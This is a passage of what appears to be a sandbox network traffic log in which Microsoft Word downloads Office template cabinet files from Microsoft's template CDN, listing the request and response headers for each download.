Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1097591
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
ETag: 0x8D60DDB7EAA50F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ceee4029-b01e-00bb-2c97-a03088000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22149
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8871139C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19a4ffc9-101e-0104-2197-a0f920000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3417042
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 25314
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8875AEF5A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f99a54d-f01e-011c-6c97-a02647000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 698244
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20554
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3256855
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
ETag: 0x8D60DDBFE4BB50C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e9528c9-a01e-0031-2697-a06b39000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 23597
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49996C1E0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1766185
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: go+WAx9Av468teUqrut+TA==
Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
ETag: 0x8D60DDC4354B7FB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ec9a4660-301e-00c7-1297-a01e77000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328940.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21791
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8883A8134
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a209c057-f01e-003c-3797-a0a3ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328951.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 19893
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499DEA2B6
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d64632e-601e-003f-4597-a08fb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328972.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21111
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49A0B8087
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 61a54fca-701e-0020-6497-a054a5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328975.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22594
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A2D135E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e960e28b-801e-0094-6497-a058a7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328983.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21875
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A5E8527
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7553c9d-c01e-0032-5897-a060b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328986.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22340
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC889AD573C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428c9efa-801e-0139-1297-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:13 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328990.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 19288
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A1DF716
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328998.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21357
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: l/W3t+nhKBmZRopcQssS5w==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A7F05EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 276650
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
ETag: 0x8D60DDB82865741
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 295527
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
ETag: 0x8D60DFAA9CC48C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 986c5e3d-201e-011e-4897-a0a4d1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 271273
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
ETag: 0x8D60DDB96BDF60C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 41deec0d-a01e-0098-7197-a0aa4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2591108
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: vrEqBGTQlsozuupDUs6ADw==
Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
ETag: 0x8D60DDBDA502B66
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8dbaa68b-901e-00e1-2b97-a0566f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:16 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 261258
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
ETag: 0x8D60DDC968C4F0E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bb8fd03d-a01e-0043-4797-a06c76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sat, 25 May 2024 09:04:12 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
